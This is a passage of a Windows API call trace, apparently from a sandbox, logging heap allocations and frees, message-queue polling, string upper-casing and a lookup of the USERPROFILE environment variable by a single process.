wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0200.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0200.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa) returned 0x2aaa6c0 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69af0 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0200.265] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0200.265] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0200.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0200.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0200.266] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0200.266] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0200.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0200.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0200.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0200.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0200.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0200.268] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.268] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0200.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0200.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0200.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0200.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0200.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0200.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0200.270] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0200.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0200.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0200.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0200.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 